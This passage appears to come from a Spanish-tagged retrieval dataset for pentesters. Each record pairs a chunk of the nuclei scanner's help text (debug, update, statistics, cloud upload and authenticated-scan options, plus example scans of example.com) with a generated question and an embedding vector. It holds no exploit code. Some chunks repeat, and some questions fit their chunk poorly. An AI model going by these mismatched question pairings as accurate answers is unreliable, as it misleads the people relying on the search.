0.07502, 0.06327, -0.00766, -0.08007, 0.05313, 0.00131, -0.09062, -0.06431, -0.03418, -0.05276, 0.00054, -0.01592, -0.16197, 0.06863, 0.02975, 0.0979, 0.12963, -0.00818, -0.02301, 0.01734, -0.01091, 0.16427, -0.0875, -0.04157, -0.05508, -0.10342, -0.03388, -0.02825, 0.00837, 0.00751, -0.0027, 0.03186, 0.01602, 0.06402, 0.022, 0.01321, 0.01037, 0.02075, -0.07105, -0.14677, -0.07615, 0.00947, 0.11192, 0.05501, 0.03283, 0.0139, -0.07405, 0.01571, 0.06004, -0.02133, -0.00412, 0.03476, -0.08059, 0.01123, -0.04056, 0.01155, 0.07099, -0.0504, -0.03826, 0.0836, 0.00627, 0.08278, -0.06502, 0.03343, 0.05846, -0.03544, -0.03163, -0.00675, 0.01294, -0.02778, -0.0251, -0.04327, -0.06242, 0.07748, 0.04243, 0.03452, 0.01294, -0.01217, -0.06318, 0.03065, 0.09829, 0.0449, -0.00098, 0.05913, -0.05384, 0.02432, -0.0477, -0.01437, -0.09033, -0.01306, 0.03087, -0.03144, -0.0091, -0.0459, 0.03933, -0.01741, -0.02588, 0.06503, -0.0676, 0.0008, 0.01213, 0.13164, 0.04288, -0.08962, 0.08562, -0.01575, -0.05222, 0.02117, 0.05065, 0.01466, 0.01304, 0.03001, 0.04967, 0.01148, 0.01921, -0.03323, -0.05484, -0.01095, 0.02152, 0.08266, 0.04849, 0.06782, -0.03909, 0.01895, -0.05947, 0.01468, 0.05621, 0.0259, -0.00993, -0.05376, -0.03874, -0.09131, -0.0357, 0.05418, 0.0442, -0.01832, -0.01826, -0.01839, -0.05818, 0.04275, -0.05713, -0.00096, -0.0092, 0.01947, 0.05113, -0.06672, 0.06015, -0.02862]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "DEBUG:\n -debug show all requests and responses\n -dreq, -debug-req show all sent requests\n -dresp, -debug-resp show all received responses\n -p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)\n -pi, -proxy-internal proxy all internal requests\n -ldf, -list-dsl-function list all supported DSL function signatures\n -tlog, -trace-log string file to write sent requests trace log\n -elog, -error-log string file to write sent requests error log\n -version show nuclei version\n -hm, -hang-monitor enable nuclei hang monitoring\n -v, -verbose show verbose output\n -profile-mem string generate memory (heap) profile & trace files\n -vv display templates loaded for scan\n -svd, -show-var-dump show variables dump for debugging\n -vdl, -var-dump-limit int limit the number of characters displayed in var dump (default 255)\n -ep, -enable-pprof enable pprof debugging server\n -tv, -templates-version shows the version of the installed nuclei-templates\n -hc, -health-check run diagnostic check up", "indexar": "cual es una alternativa libre a nuclei para escanear vulnerabilidades?", "v": [0.07273, -0.08213, -0.10272, 0.05021, -0.02147, -0.02675, -0.0917, -0.13109, -0.08918, 0.00406, -0.00664, -0.20164, -0.11316, 0.03487, -0.02616, 0.00693, -0.02762, -0.15056, 0.14946, 0.12174, -0.122, -0.06575, -0.08658, -0.02222, -0.12082, -0.00385, -0.08282, 0.08215, 0.02687, -0.02069, -0.05748, -0.03838, 0.09741, -0.04588, 0.01008, 0.11919, 0.10239, 0.00839, 0.13104, -0.023, 0.02833, -0.03803, -0.07742, -0.00222, 0.02056, -0.07513, -0.11102, -0.01464, 0.0785, 0.00844, -0.07737, 0.03398, -0.1468, 0.03783, 0.05244, -0.02829, 0.18071, -0.06509, 0.04299, 0.00635, -0.15806, 0.11511, 0.08917, -0.11455, 0.01551, -0.00374, -0.07662, 0.0059, -0.17122, 0.09996, 0.02402, -0.01101, -0.00257, -0.06272, -0.13587, 0.03266, -0.06232, -0.00433, -0.04098, 0.10817, 0.05983, -0.04114, 0.02934, 0.07217, -0.14481, -0.03873, 0.15445, -0.07131, -0.0043, 0.05494, 0.1047, 0.01713, -0.02733, 0.1579, 0.00223, -0.06439, 0.06596, 0.10332, -0.03325, 0.05748, 0.02007, -0.04146, -0.12551, 0.10632, 0.0536, 0.04364, -0.05742, 0.02258, -0.01779, -0.00818, -0.04893, 0.00469, -0.02671, -0.02812, -0.05699, 0.04732, -0.02149, 0.02908, 0.04545, -0.04518, -0.0159, -0.04765, -0.04619, -0.04071, -0.01229, 0.00509, 0.01362, 0.01939, -0.00461, 0.02802, -0.00574, -0.01699, -0.05443, -0.04153, -0.10549, -0.0119, 0.04148, -0.14641, 0.00251, -0.02412, 0.07891, -0.00108, 0.01159, 0.01787, -0.00748, -0.01423, 0.03683, -0.05486, -0.02887, -0.01285, -0.02669, 0.00472, -0.04934, 0.12867, -0.07646, -0.0274, -0.09152, -0.03183, -0.03031, 0.13571, 0.02923, 0.03776, -0.01476, 0.03243, -0.03832, -0.00122, 0.04691, -0.01857, -0.05284, 0.01818, -0.01068, 0.09796, 0.04517, -0.06695, 0.07035, -0.07202, 0.04251, -0.08689, 0.03828, -0.05237, 0.02218, -0.00487, -0.0784, 0.02065, -0.01103, -0.0048, 0.00157, 0.02775, 0.02471, 0.03287, -0.05845, -0.00476, -0.07844, -0.02203, 0.01186, -0.02086, -0.01252, -0.0699, -0.00331, -0.03104, -0.02325, 0.01217, 0.00854, -0.03344, 0.01528, 0.01322, -0.04971, -0.03509, 0.01053, 0.06021, 0.03566, 0.00039, 0.12766, 0.02981, -0.08642, -0.02784, 0.02192, 0.04588, 0.00769, -0.03594, 0.04301, 0.01586, 0.04139, 0.03336, -0.0173, 0.02902, -0.03116, -0.01097, 0.01529, 0.02221, 0.03624, 0.00788, -0.01781, 0.01602, 0.04099, 0.00566, 0.00563, 0.01807, 0.0214, -0.01457, 0.07808, 0.05412, -0.05472, -0.03693, -0.01069, -0.01157, -0.06733, 0.02172, 0.00185, -0.02416, -0.0114, 0.04877, 0.03665, -0.0701, 0.05176, -0.04171]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UPDATE:\n -up, -update update nuclei engine to the latest released version\n -ut, -update-templates update nuclei-templates to latest released version\n -ud, -update-template-dir string custom directory to install / update nuclei-templates\n -duc, -disable-update-check disable automatic nuclei/templates update check\n\nSTATISTICS:\n -stats display statistics about the running scan\n -sj, -stats-json display statistics in JSONL(ines) format\n -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)\n -mp, -metrics-port int port to expose nuclei metrics on (default 9092)\n -hps, -http-stats enable http status capturing (experimental)", "indexar": "que programa sirve para hacer escaneos rΓ‘pidos de sitios web?", "v": [0.01708, -0.00017, -0.23126, -0.07978, 0.06465, -0.17985, 0.01298, -0.18752, 0.00845, -0.01488, -0.02609, 0.014, -0.00889, -0.12024, 0.05866, 0.03824, 0.10984, 0.02484, 0.12398, 0.02564, -0.03264, 0.01033, -0.04498, -0.00656, -0.07939, -0.05712, 0.05842, 0.0187, -0.15125, 0.05515, 0.02514, 0.11, 0.02854, -0.01006, -0.01214, -0.07448, 0.13389, -0.04924, 0.01067, -0.0059, 0.00273, -0.03376, -0.1249, -0.05338, 0.00172, -0.01765, -0.06084, -0.01415, 0.00881, -0.0399, -0.00115, -0.02732, -0.05228, -0.06382, -0.02289, -0.05523, 0.05495, -0.15555, -0.09082, 0.01769, -0.03225, 0.00021, 0.02112, -0.0619, 0.02143, 0.02582, 0.06087, 0.05958, -0.05109, -0.04524, -0.03787, 0.03023, 0.16434, -0.041, 0.04089, -0.0633, -0.0321, 0.03758, 0.01846, -0.0075, 0.05066, -0.02302, -0.0639, 0.04335, -0.0957, 0.00013, -0.05859, -0.08233, -0.01988, -0.03946, 0.09239, 0.13786, 0.03518, 0.09161, 0.00906, -0.1244, 0.16429, 0.05386, 0.09125, 0.04642, 0.0048, -0.08775, -0.15345, 0.07088, -0.05232, 0.13211, 0.09887, -0.01531, -0.10147, 0.07795, 0.04969, -0.00731, -0.08385, -0.05766, -0.12785, 0.01547, 0.05703, -0.011, 0.02518, -0.02068, -0.13535, 0.0244, -0.07887, 0.00469, -0.00685, 0.02313, 0.0264, 0.03664, -0.00252, 0.02754, 0.00086, -0.04626, -0.04319, -0.00988, -0.08018, -0.05834, 0.04633, -0.01477, 0.0938, -0.05781, 0.05866, -0.02249, -0.05264, 0.03637, -0.02557, -0.02154, 0.05665, -0.05613, -0.03704, 0.03032, -0.04148, 0.03772, -0.1036, -0.00342, -0.07033, -0.10718, -0.02583, 0.00399, -0.09571, 0.06542, -0.05542, 0.03605, 0.0861, 0.01531, 0.01426, -0.01524, -0.0364, 0.09218, 0.05812, 0.09701, 0.00444, 0.12635, -0.01263, -0.16095, 0.03717, 0.08682, -0.02299, -0.03977, 0.05526, -0.02788, -0.06213, -0.01168, 0.01046, 0.05893, -0.04122, -0.02006, 0.04187, -0.01484, -0.03541, 0.04997, 0.01619, -0.03575, -0.02398, -0.00473, 0.02417, 0.01951, -0.02334, -0.01204, 0.10473, -0.08182, -0.05144, -0.06387, 0.00728, -0.04384, -0.03478, 0.09316, 0.01322, -0.09021, -0.00161, 0.09195, -0.03547, -0.02657, 0.05425, -0.03906, -0.0096, -0.07505, 0.06955, 0.01813, -0.02635, 0.03466, 0.02327, -0.0154, -0.03506, 0.08804, 0.02135, -0.00178, 0.0767, -0.03738, 0.02584, 0.01308, -0.0249, -0.08157, -0.05174, -0.05656, 0.05075, -0.05039, -0.02505, 0.00603, -0.05398, -0.02359, -0.03495, 0.00943, -0.02395, -0.01278, 0.03125, -0.02438, -0.04184, -0.05194, 0.0101, 0.05013, -0.06919, -0.05681, 0.0095, -0.03274, 0.03893, 0.03235]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UPDATE:\n -up, -update update nuclei engine to the latest released version\n -ut, -update-templates update nuclei-templates to latest released version\n -ud, -update-template-dir string custom directory to install / update nuclei-templates\n -duc, -disable-update-check disable automatic nuclei/templates update check\n\nSTATISTICS:\n -stats display statistics about the running scan\n -sj, -stats-json display statistics in JSONL(ines) format\n -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)\n -mp, -metrics-port int port to expose nuclei metrics on (default 9092)\n -hps, -http-stats enable http status capturing (experimental)", "indexar": "con quΓ© puedo verificar el estado de un servidor en masa?", "v": [-0.08507, 0.11712, -0.19409, -0.00493, -0.05503, -0.05097, 0.02226, -0.15606, 0.04022, -0.14698, -0.13195, -0.03508, 0.0053, -0.06762, 0.0955, 0.12167, 0.1349, -0.07421, 0.06219, 0.01468, 0.09422, -0.12019, 0.07981, -0.02205, -0.10255, 0.12951, -0.0385, -0.07908, -0.13006, -0.08033, 0.0279, -0.01365, 0.01114, -0.04892, 0.02246, 0.00376, 0.01754, 0.17669, -0.04784, 0.05621, 0.02332, 0.07402, 0.05258, -0.01636, 0.02217, -0.049, -0.00528, -0.09995, 0.0047, -0.04435, -0.04787, -0.02548, -0.15077, 0.0387, -0.07712, 0.0784, -0.03654, -0.06554, 0.16485, 0.00655, -0.15787, -0.05397, -0.09635, -0.04786, 0.05118, 0.0616, 0.00931, -0.04586, -0.00834, -0.04842, -0.06016, 0.05584, -0.01536, -0.11642, -0.05939, 0.06794, -0.02089, -0.01982, 0.10039, 0.03234, 0.04205, 0.10122, 0.00103, 0.06942, -0.15419, -0.08437, -0.01202, -0.10285, 0.02764, -0.01724, 0.03399, 0.09764, -0.05472, 0.13181, -0.01776, 0.01247, 0.06956, -0.06061, -0.01628, 0.03629, 0.13685, 0.00931, -0.04073, 0.07224, -0.01571, 0.00902, 0.0764, -0.04734, 0.04792, -0.05055, 0.06426, -0.01531, -0.12513, -0.01081, 0.00537, -0.082, -0.06875, -0.07758, 0.0231, 0.0666, -0.04463, 0.02211, -0.02171, 0.03458, 0.05047, -0.04671, 0.08966, 0.03793, 0.01612, 0.02349, 0.049, -0.02751, -0.08645, -0.0264, -0.01392, 0.02729, -0.0045, -0.05296, -0.03155, -0.01628, 0.00291, 0.07584, 0.02989, 0.00741, 0.10994, 0.02803, 0.02125, -0.04171, -0.15465, 0.01113, 0.01694, -0.02707, -0.03879, 0.06247, -0.05342, -0.03176, 0.03845, -0.0559, 0.06481, 0.02028, 0.03982, 0.02622, -0.00796, 0.01233, 0.01299, 0.04528, -0.04188, 0.03472, 0.07287, -0.00303, -0.08572, -0.0242, 0.01299, -0.07749, -0.00334, -0.01068, -0.08704, -0.0304, -0.01709, -0.02873, -0.02414, 0.06361, -0.03677, 0.00585, -0.08966, -0.0297, -0.00232, 0.01278, 0.04512, 0.06485, 0.05938, 0.01198, 0.00599, 0.05691, 0.07323, -0.04186, -0.00026, 0.01062, 0.00203, -0.04879, -0.05661, -0.03028, -0.06479, -0.06333, -0.015, 0.00103, -0.06819, 0.05916, -0.02192, 0.00013, 0.00191, -0.01166, 0.12839, -0.04763, -0.0637, 0.02507, 0.04598, -0.04693, -0.06412, -0.01191, 0.00803, 0.01571, 0.0426, 0.02168, 0.03539, 0.0555, -0.00119, 0.06492, 0.06981, 0.02789, -0.04218, 0.04005, -0.05185, -0.00812, 0.0545, -0.01212, 0.06123, -0.05172, -0.0521, -0.07344, 0.05108, 0.12508, -0.03219, -0.06489, 0.02029, -0.02588, -0.07585, 0.01317, -0.03845, -0.05163, 0.01554, -0.01412, 0.0216, -0.06348, 0.0173, -0.06296]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UPDATE:\n -up, -update update nuclei engine to the latest released version\n -ut, -update-templates update nuclei-templates to latest released version\n -ud, -update-template-dir string custom directory to install / update nuclei-templates\n -duc, -disable-update-check disable automatic nuclei/templates update check\n\nSTATISTICS:\n -stats display statistics about the running scan\n -sj, -stats-json display statistics in JSONL(ines) format\n -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)\n -mp, -metrics-port int port to expose nuclei metrics on (default 9092)\n -hps, -http-stats enable http status capturing (experimental)", "indexar": "cual es una herramienta que muestre estadΓ­sticas detalladas sobre los resultados de un test?", "v": [0.0065, 0.07513, 0.06787, -0.08967, 0.09895, -0.0701, -0.12691, -0.10251, -0.00174, -0.05091, -0.19784, 0.03513, -0.13888, -0.03381, 0.07083, -0.01354, 0.11258, -0.13075, 0.02915, -0.08071, -0.06712, -0.1425, -0.13949, 0.01217, -0.11737, 0.0149, 0.00489, 0.00348, -0.17162, 0.01707, -0.02614, 0.03089, -0.03526, -0.12089, -0.05707, 0.05393, 0.03007, 0.03773, -0.05696, 0.06419, -0.08065, -0.07573, 0.01265, -0.04634, 0.05003, -0.04968, -0.15869, 0.07777, 0.03334, 0.04507, 0.00652, -0.02986, -0.02594, -0.04567, -0.02726, -0.17429, 0.05069, -0.0926, 0.08385, -0.05785, -0.0166, -0.02864, -0.08575, -0.04726, -0.01488, -0.06608, 0.0482, -0.03294, -0.07974, -0.00325, 0.0854, 0.1434, 0.01184, -0.02433, -0.09537, 0.03763, 0.03376, 0.05356, -0.04197, -0.04623, 0.03637, -0.05133, -0.02263, 0.02384, -0.08264, -0.03949, 0.08734, -0.05295, 0.05459, -0.08605, -0.02819, 0.00798, -0.04185, 0.0775, 0.01285, -0.05989, 0.12678, -0.09376, 0.0065, -0.10715, 0.09201, -0.01797, -0.09354, 0.04463, -0.03436, 0.06964, -0.04933, -0.00105, -0.16069, -0.03515, 0.04005, 0.00179, -0.06745, 0.0317, -0.0057, 0.02299, 0.00552, -0.04702, -0.05671, -0.13711, -0.00859, 0.17593, -0.08318, -0.06425, -0.05179, -0.03906, 0.10963, 0.03591, 0.07899, -0.01859, 0.01085, 0.02446, -0.09534, 0.04553, 0.01229, -0.01953, 0.01747, -0.15551, 0.05534, -0.00179, 0.00463, 0.01056, 0.02748, -0.10753, 0.01532, -0.02724, 0.03107, 0.02557, -0.11077, 0.00251, -0.01753, -0.01002, 0.037, 0.05738, -0.01652, -0.02611, 0.00753, -0.01681, -0.02385, 0.01838, -0.03004, -0.04829, 0.00404, -0.00729, 0.11714, 0.00935, 0.01116, -0.00352, 0.08039, -0.0365, 0.00528, -0.01847, 0.01235, -0.03172, 0.04123, 0.04627, -0.03976, -0.0226, -0.05824, -0.08412, -0.00883, 0.07239, -0.03754, -0.05693, 0.053, -0.03079, 0.02039, -0.06035, 0.01318, 0.07589, 0.06449, 0.00598, 0.02446, -0.04091, 0.07993, 0.01913, 0.03767, -0.05063, -0.00305, -0.05046, -0.09298, -0.04847, -0.04652, -0.02989, 0.00111, 0.04716, -0.01406, -0.00461, 0.02632, -0.02066, 0.00644, 0.01423, 0.01207, -0.07114, -0.01856, 0.02841, 0.02189, -0.01982, -0.03848, -0.04033, 0.03779, 0.0149, 0.07821, -0.0407, -0.01908, 0.0715, 0.03776, 0.04403, 0.04068, 0.01969, 0.00392, -0.03108, 0.00199, 0.04488, 0.02183, -0.01054, 0.04283, -0.03548, -0.03589, -0.12494, -0.00257, 0.09711, 0.06566, -0.06969, -0.05578, 0.00407, -0.05293, -0.01131, -0.06184, -0.1297, 0.02258, -0.0263, 0.08432, -0.03914, 0.07405, -0.02922]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CLOUD:\n -auth configure projectdiscovery cloud (pdcp) api key (default true)\n -tid, -team-id string upload scan results to given team id (optional) (default \"none\")\n -cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]\n -sid, -scan-id string upload scan results to existing scan id (optional)\n -sname, -scan-name string scan name to set (optional)\n -pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard\n -pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard\n\nAUTHENTICATION:\n -sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan\n -ps, -prefetch-secrets prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n\t$ nuclei -target example.com\n\nRun nuclei with specific template directories:\n\t$ nuclei -target example.com -t http/cves/ -t ssl\n\nRun nuclei against a list of hosts:\n\t$ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n\t$ nuclei -target example.com -json-export output.json", "indexar": "con que puedo subir los resultados de mis escaneos al panel de ProjectDiscovery Cloud?", "v": [-0.13366, -0.08632, -0.14992, -0.13764, -0.02448, -0.20877, -0.03458, -0.03075, -0.12084, -0.05535, -0.15678, -0.05373, -0.15357, -0.03569, -0.08606, -0.07443, 0.01508, -0.01952, -0.01085, 0.03276, 0.04281, -0.1112, -0.15649, -0.08772, 0.01108, 0.05509, -0.01807, 0.07127, 0.03815, -0.09968, -0.02859, 0.07365, 0.00092, -0.01596, -0.02136, -0.11828, -0.01361, 0.05893, -0.009, -0.13934, -0.17625, -0.00642, -0.1187, -0.0575, -0.00962, -0.12302, -0.01749, -0.00947, -0.06346, 0.00581, -0.11419, 0.04428, -0.1534, -0.00878, -0.00071, -0.099, -0.00314, -0.0071, 0.0536, -0.05936, 0.00828, 0.04412, -0.03396, -0.11676, 0.06981, -0.0131, -0.13549, 0.09128, -0.06451, 0.08483, 0.0352, 0.11906, 0.0524, -0.17136, 0.07965, -0.03457, -0.05239, -0.02117, -0.03142, 0.00689, -0.02089, 0.05129, -0.06904, 0.08794, -0.17843, -0.03744, -0.0654, -0.1163, -0.01349, -0.02017, -0.00977, 0.00704, 0.02446, 0.0281, -0.01491, -0.03225, 0.10432, -0.00258, -0.10769, -0.05004, 0.02252, 0.01211, 0.08081, 0.06228, 0.01965, 0.13553, 0.02192, -0.04062, -0.04084, 0.05312, 0.03137, 0.03615, 0.01062, 0.01245, -0.10398, -0.06524, -0.05636, 0.02648, 0.0384, 0.03225, -0.01625, -0.08934, 0.03037, -0.01795, 0.01906, -0.04586, 0.05401, 0.03461, -0.04077, -0.01552, -0.03207, 0.04478, 0.00531, 0.0304, 0.0314, -0.00743, -0.01319, -0.02418, 0.04808, -0.08102, 0.06771, 0.01532, -0.02866, 0.01788, 0.00537, -0.06972, 0.01038, 0.01283, 0.03592, -0.13356, -0.01149, 0.08415, 0.02361, 0.10443, 0.01856, 0.01903, 0.05995, 0.00715, 0.02036, 0.0598, -0.01599, -0.00535, 0.01306, 0.07011, 0.0131, -0.00656, -0.00224, -0.03828, 0.03502, 0.06239, -0.04413, 0.03908, -0.02004, -0.11224, 0.1069, -0.02289, 0.05943, -0.06269, 0.0479, -0.04311, -0.11787, 0.02404, 0.05087, 0.01572, 0.00148, -0.0987, 0.01171, 0.00692, 0.00269, 0.09176, 0.03235, 0.03215, -0.034, -0.06227, -0.05962, -0.04573, 0.01923, -0.0223, -0.04408, 0.00627, -0.02462, -0.02149, -0.00433, -0.03669, -0.10515, -0.05555, -0.03058, 0.07752, 0.09077, 0.06094, 0.02626, -0.00764, 0.02879, -0.03629, 0.02734, 0.10964, 0.03175, 0.00282, -0.05147, 0.00369, 0.03755, 0.04732, 0.06395, 0.0471, 0.0249, -0.03513, -0.03131, 0.01765, 0.05179, 0.01545, -0.03443, 0.04876, 0.04781, 0.03771, 0.02315, 0.00863, 0.06798, 0.01063, -0.0577, 0.00375, 0.02406, 0.03095, 0.0316, 0.00968, -0.03046, -0.02235, -0.06085, 0.05294, 0.01556, -0.02927, -0.01165, 0.00979, -0.00923, -0.02582, 0.03538, -0.00149]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CLOUD:\n -auth configure projectdiscovery cloud (pdcp) api key (default true)\n -tid, -team-id string upload scan results to given team id (optional) (default \"none\")\n -cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]\n -sid, -scan-id string upload scan results to existing scan id (optional)\n -sname, -scan-name string scan name to set (optional)\n -pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard\n -pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard\n\nAUTHENTICATION:\n -sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan\n -ps, -prefetch-secrets prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n\t$ nuclei -target example.com\n\nRun nuclei with specific template directories:\n\t$ nuclei -target example.com -t http/cves/ -t ssl\n\nRun nuclei against a list of hosts:\n\t$ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n\t$ nuclei -target example.com -json-export output.json", "indexar": "cual es una alternativa gratuita o open source para hacer auditorΓ­as automatizadas de seguridad en mΓΊltiples hosts?", "v": [0.0512, 0.10352, -0.09366, -0.14873, -0.04261, -0.02023, -0.09072, -0.09959, -0.23546, -0.03724, -0.13406, -0.2148, 0.09586, 0.10191, 0.10411, -0.09035, 0.11013, -0.06898, 0.04247, 0.08245, 0.06765, -0.02014, -0.05365, -0.0508, -0.14199, -0.04621, 0.05526, 0.02598, -0.13003, 0.04029, 0.01295, 0.01386, 0.05936, 0.03005, -0.04302, 0.02401, 0.0299, 0.094, 0.09105, -0.04782, 0.01478, 0.03915, -0.03743, 0.06224, 0.11969, -0.05099, -0.05812, 0.10007, 0.01754, -0.01121, -0.07477, -0.0931, -0.11221, -0.02763, 0.06705, -0.04868, 0.09316, -0.14948, -0.0076, -0.08029, -0.06242, 0.0864, 0.04044, 0.04327, -0.08112, 0.03177, 0.06568, -0.00782, -0.01902, 0.03675, 0.04296, -0.02172, 0.02592, 0.06724, -0.07144, -0.02671, -0.05042, -0.02527, -0.03735, 0.17008, 0.03704, -0.02015, 0.05562, 0.04982, -0.08599, -0.11409, -0.03835, -0.02107, -0.04757, 0.05142, 0.00538, 0.00831, 0.06944, 0.11151, -0.01655, -0.10291, 0.14578, 0.01389, -0.08203, 0.05491, 0.02649, -0.04664, -0.02734, 0.09421, 0.0458, 0.02107, -0.02734, -0.01308, 0.0036, -0.03717, -0.03694, 0.05275, -0.08253, -0.01256, -0.02484, -0.04885, -0.0028, 0.02305, 0.04283, 0.00566, -0.05029, -0.00224, -0.06979, -0.04319, 0.02791, -0.01899, 0.092, 0.08817, 0.04326, 0.02672, 0.07925, -0.04204, -0.0899, -0.06631, -0.07408, -0.01903, -0.00153, -0.09248, -0.04492, -0.02045, -0.00065, 0.06564, 0.09115, -0.04618, 0.067, -0.0344, -0.01416, -0.07506, -0.06149, 0.00385, -0.08544, 0.00653, -0.04091, 0.02897, -0.04415, 0.06222, -0.02549, -0.06262, -0.04728, 0.10741, 0.07301, -0.04058, 0.03235, 0.04569, -0.01471, -0.01909, 0.05357, -0.07386, 0.001, -0.04389, -0.03264, 0.11319, -0.00207, -0.03072, -0.012, -0.0394, 0.03513, -0.14703, 0.02737, -0.10012, 0.00768, -0.00195, -0.06253, -0.04514, 0.05922, -0.06459, 0.0661, 0.0086, 0.02634, 0.02573, -0.01259, 0.02437, -0.11758, -0.03046, 0.0448, -0.04636, 0.02551, -0.10068, -0.07917, 0.01094, -0.08325, 0.02242, -0.02349, -0.07638, 0.05935, 0.03817, 0.02934, 0.05028, 0.00292, -0.00715, 0.05631, 0.01732, 0.1011, -0.08539, -0.01638, 0.00861, -0.0293, -0.04052, -0.02951, 0.00722, -0.00407, -0.04551, 0.02801, 0.00454, -0.0005, -0.01269, 0.05713, 0.05503, 0.01353, -0.00159, -0.02617, 0.01869, -0.02767, 0.01486, 0.03858, -0.02152, -0.01957, 0.00744, 0.04452, -0.09182, 0.02964, 0.06313, -0.00373, -0.03544, -0.04056, -0.03884, -0.03916, 0.00715, -0.00329, -0.0734, -0.05577, 0.06935, -0.01872, 0.01292, 0.00359, -0.02621]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CLOUD:\n -auth configure projectdiscovery cloud (pdcp) api key (default true)\n -tid, -team-id string upload scan results to given team id (optional) (default \"none\")\n -cup, -cloud-upload upload scan results to pdcp dashboard [DEPRECATED use -dashboard]\n -sid, -scan-id string upload scan results to existing scan id (optional)\n -sname, -scan-name string scan name to set (optional)\n -pd, -dashboard upload / view nuclei results in projectdiscovery cloud (pdcp) UI dashboard\n -pdu, -dashboard-upload string upload / view nuclei results file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard\n\nAUTHENTICATION:\n -sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan\n -ps, -prefetch-secrets prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n\t$ nuclei -target example.com\n\nRun nuclei with specific template directories:\n\t$ nuclei -target example.com -t http/cves/ -t ssl\n\nRun nuclei against a list of hosts:\n\t$ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n\t$ nuclei -target example.com -json-export output.json", "indexar": "cΓ³mo obtengo las credenciales necesarias para ejecutar un escaneo autenticado sin tener que repetirlas cada vez?", "v": [-0.18782, -0.02883, -0.23373, 0.13691, 0.23675, 0.02236, -0.00457, -0.00764, -0.1786, -0.06152, -0.1987, 0.09169, -0.08845, -0.09128, 0.1203, 0.04666, 0.0361, 0.02404, 0.14409, 0.07175, -0.03621, -0.06982, -0.00088, -0.00577, 0.01974, 0.01363, -0.09445, 0.1238, -0.01515, 0.11721, -0.04286, 0.1666, 0.02216, -0.06107, -0.00848, 0.13438, -0.0464, 0.05192, -0.09991, 0.09198, -0.04147, 0.11869, -0.11183, -0.09251, 0.02924, -0.02076, 0.03633, 0.09593, -0.08596, 0.04452, 0.00697, -0.0299, -0.11902, -0.13773, -0.06414, -0.03539, 0.11387, -0.01682, 0.10456, -0.10042, -0.06193, 0.02328, 0.12741, 0.08, -0.02052, 0.04158, 0.0154, -0.03808, 0.05609, 0.06401, -0.09603, 0.03938, 0.03924, 0.07922, 0.02219, -0.1391, 0.04118, -0.068, 0.06818, 0.04404, 0.01253, -0.10762, -0.06211, -0.01268, -0.03708, -0.02671, -0.00294, -0.02908, 0.03401, -0.03522, 0.01576, 0.01344, 0.00702, 0.01854, 0.06359, 0.01342, 0.01527, -0.04468, -0.01592, 0.08598, -0.02976, -0.09063, -0.06398, 0.08306, -0.01075, 0.09472, -0.05809, -0.00407, -0.01081, -0.02463, -0.05304, 0.03087, -0.03669, -0.00191, -0.00745, 0.03934, -0.03112, -0.02483, 0.02005, -0.05493, -0.04108, -0.09204, 0.04976, -0.03243, -0.01789, 0.05073, -0.08013, 0.01113, 0.02927, -0.01605, -0.07285, -0.00123, -0.06097, 0.0033, -0.01661, -0.07108, 0.05964, -0.04455, -0.05391, -0.06627, 0.01924, 0.01765, -0.01472, -0.05975, 0.00389, 0.07281, -0.03962, -0.09737, -0.06479, 0.02434, 0.02806, 0.03099, -0.03228, 0.05555, -0.10199, -0.04569, 0.04446, -0.02407, 0.04928, 0.07833, -0.01751, -0.07915, 0.03722, 0.02874, 0.03234, -0.04067, -0.05778, -0.05462, -0.00923, -0.01719, 0.00801, 0.0446, -0.06135, -0.04522, 0.05405, 0.00943, 0.03675, -0.03191, 0.00029, -0.00628, -0.00637, 0.02358, 0.00427, 0.03072, 0.04427, 0.00581, -0.05671, 0.01688, -0.02112, 0.07043, 0.11297, 0.00101, 0.01732, 0.00567, 0.00676, 0.0181, 0.00465, -0.02653, 0.03277, 0.00393, -0.11497, -0.05361, 0.02294, -0.03586, 0.1058, 0.02545, -0.05615, -0.01937, -0.06122, 0.08031, 0.03193, -0.02465, 0.04733, -0.05967, -0.02117, -0.05051, -0.00243, -0.01754, -0.04579, -0.01241, -0.01269, 0.0261, 